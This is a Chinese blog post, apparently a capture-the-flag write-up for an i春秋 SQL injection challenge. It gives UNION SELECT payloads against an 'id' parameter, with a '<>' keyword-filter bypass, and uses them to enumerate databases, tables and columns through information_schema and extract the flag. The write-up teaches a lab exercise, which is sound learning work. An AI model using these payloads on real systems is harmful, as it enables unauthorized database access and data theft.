i春秋之SQL(详细WP)

解题目录

第一步:寻找注入点

第二步:确定注入类型

第三部:爆表

第四步: 查表


在看WP之前呢,有不懂的地方推荐查看下面的文章(挺详细的),还是需要些MySQL基础的

web 漏洞入门之 —— SQL 注入教程_实验楼-CSDN博客

第一步:寻找注入点

题目直接告诉我们了,这是道SQL注入题,打开连接,不难发现id应该就是注入点了

第二步:确定注入类型

用limit x 1或order by x,判断字段数 ,这里用order by

出现报错,应该是关键字被过滤掉了,这里尝试绕过了很久,发现好像只有<>能绕过了

可以看见,当x为4的时候,出现页面出现错误,说明该SQL查询语句的字段数为3,也就是说,该查询语句查询了3个列

第三部:爆表

利用基础的联合查询union select , 查看数据库信息

构造payload,先看看有回显的列

inurl?id=-1 unio<>n s<>elect 1,2,3

这里故意让id等于-1,是为了制造错误让语句不执行,防止影响到后面操作

回显了2说明,这个位置可以利用

构造paload,查询所有可用的数据库 

inurl?id=-1 unio<>n s<>elect 1,table_schema,3 from information_schema.tables

可以看到只有两个数据库,当前使用的数据库应该就是sqli ,也可以用database()查看

database()       当前使用的数据库

构造payload,查询sqli数据库的所有表

inurl?id=-1 unio<>n s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'

 继续查看表里面的所有列

inurl?id=-1 unio<>n s<>elect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'

发现放flag的列名啦

第四步: 查表

构造payload,查看对应列名

inurl?id=-1 unio<>n s<>elect 1,group_concat(flAg_T5ZNdrm),3 from info

 拿到flag

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值